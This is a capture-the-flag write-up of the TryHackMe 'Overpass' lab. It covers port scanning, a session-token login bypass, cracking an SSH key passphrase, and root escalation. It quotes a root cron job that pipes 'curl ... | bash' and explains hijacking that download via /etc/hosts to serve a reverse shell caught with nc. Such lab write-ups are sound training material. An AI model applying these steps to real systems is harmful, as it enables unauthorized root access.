OVERPASS [TRYHACKME] Writeup

As usual first i started with rustscan

got all these results

Open 10.10.162.100:22
Open 10.10.162.100:80

Then did a nmap scan on these ports

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLYC7Hj7oNzKiSsLVMdxw3VZFyoPeS/qKWID8x9IWY71z3FfPijiU7h9IPC+9C+kkHPiled/u3cVUVHHe7NS68fdN1+LipJxVRJ4o3IgiT8mZ7RPar6wpKVey6kubr8JAvZWLxIH6JNB16t66gjUt3AHVf2kmjn0y8cljJuWRCJRo9xpOjGtUtNJqSjJ8T0vGIxWTV/sWwAOZ0/TYQAqiBESX+GrLkXokkcBXlxj0NV+r5t+Oeu/QdKxh3x99T9VYnbgNPJdHX4YxCvaEwNQBwy46515eBYCE05TKA2rQP8VTZjrZAXh7aE0aICEnp6pow6KQUAZr/6vJtfsX+Amn3
| 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMyyGnzRvzTYZnN1N4EflyLfWvtDU0MN/L+O4GvqKqkwShe5DFEWeIMuzxjhE0AW+LH4uJUVdoC0985Gy3z9zQU=
| 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINwiYH+1GSirMK5KY0d3m7Zfgsr/ff1CP6p14fPa7JOR
80/tcp open http syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-favicon: Unknown favicon MD5: 0D4315E5A0B066CEFD5B216C8362564B
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Overpass
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

After all these I started enumerating the website!

as the tags given to the machine was owasp top 10
So, I started for looking for the OWASP vuln in the website

on the side started a gobuster scan and got all these directories available

/img (Status: 301) [Size: 0] [ → img/]
/downloads (Status: 301) [Size: 0] [ → downloads/]
/aboutus (Status: 301) [Size: 0] [ → aboutus/]
/admin (Status: 301) [Size: 42] [ → /admin/]
/css (Status: 301) [Size: 0] [ → css/]

went to admin page found a login page started doing looking for sql and other vuln! after some unsuccessful tried i just! looked

the Debugger part where i saw the login.js file read through that i found something related to session token started playing with that and did this

after that i refreshed the page and got the ssh keys for james
copied that ssh keys and pasted inn one of the folder tried to crack the ssh passphrase! like this pasted the ssh key into the overpass_ssh ! after that i converted the keys into the hash so the john can crack the file!

got the passphrase as james13

after that i just logged in into the ssh of james

ssh -i overpass_ssh james@10.10.162.100

First what i did was

sudo -l

but it asked for password didnt got anything good! after that tried to look for suid files but havent got anything good

find / -type f -perm -u=s 2>/dev/null

then i just checked for crontab and saw this

* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

as you can see it is downloading something from overpass.thm and passing it into the bash! as a root user so i just ! tried to fake the website by making a directory with sub directories

download/src/buildscript.sh

and editing the /etc/hosts file in the victim pc
like this

and making a rev shell file in my pc named buildscipt.sh and hosting that file

now i just hosted the downloads folder by using

python3 -m http.server

and started a nc listener on other terminal

now as the victim pc runs the crontab command it will download the file from my pc and send a rev shell on the attacker pc

and i will get root!
waited for sometime and got the root shell on my pc

DONE!

I just trying to better at hacking!